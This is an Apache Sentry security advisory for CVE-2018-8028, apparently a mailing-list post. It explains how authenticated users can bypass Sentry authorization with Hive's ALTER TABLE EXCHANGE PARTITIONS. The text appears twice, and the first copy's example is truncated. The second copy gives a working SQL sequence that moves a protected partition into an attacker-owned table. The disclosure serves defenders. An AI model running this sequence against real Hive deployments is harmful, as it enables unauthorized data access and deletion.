Sergio Peña
2018-08-23 16:38:32 UTC
[SECURITY] CVE-2018-8028: Bypass ALTER TABLE EXCHANGE PARTITIONS
authorization for Hive
Severity:
Major
Vendor:
The Apache Software Foundation
Versions Affected:
This vulnerability affects only the version of Apache Sentry 2.0.0 due to
the introduction of
Hive 2.x.
Description:
An authenticated user can execute ALTER TABLE EXCHANGE PARTITIONS without
being authorized by Sentry.
This can allow an attacker unauthorized access to the partitioned data of a
Sentry protected table and can allow
an attacker to remove data from a Sentry protected table.
Mitigation:
Apache Sentry users using 2.0.0 should upgrade to 2.0.1 or later.
Example:
The admin has created the following table in a database that the attacker
WITH TABLE target_database1.aliens;
The attacker now has access to all of the data in the target partitions
with the privileges available to them on attacker_database.
Credit:
This issue was discovered by Benjamin Iglauer of Cloudera.
References:
https://cwiki.apache.org/confluence/display/SENTRY/Vulnerabilities+found+in+Apache+Sentry
authorization for Hive
Severity:
Major
Vendor:
The Apache Software Foundation
Versions Affected:
This vulnerability affects only the version of Apache Sentry 2.0.0 due to
the introduction of
Hive 2.x.
Description:
An authenticated user can execute ALTER TABLE EXCHANGE PARTITIONS without
being authorized by Sentry.
This can allow an attacker unauthorized access to the partitioned data of a
Sentry protected table and can allow
an attacker to remove data from a Sentry protected table.
Mitigation:
Apache Sentry users using 2.0.0 should upgrade to 2.0.1 or later.
Example:
The admin has created the following table in a database that the attacker
CREATE TABLE target_database1.aliens (name string) PARTITIONED BY
(home_planet string, diet string);ALTER TABLE target_database1.aliens ADD PARTITION (home_planet='earth',
diet='milk shakes');ALTER TABLE target_database1.aliens ADD PARTITION
(home_planet='trapis-4', diet='sentient lifeforms with cheese');CREATE TABLE attacker_database.data_stealer (name string) PARTITIONED BY
(home_planet string, diet string);ALTER TABLE attacker_database.data_stealer EXCHANGE PARTITION
(home_planet='earth', diet='milk shakes')WITH TABLE target_database1.aliens;
The attacker now has access to all of the data in the target partitions
with the privileges available to them on attacker_database.
Credit:
This issue was discovered by Benjamin Iglauer of Cloudera.
References:
https://cwiki.apache.org/confluence/display/SENTRY/Vulnerabilities+found+in+Apache+Sentry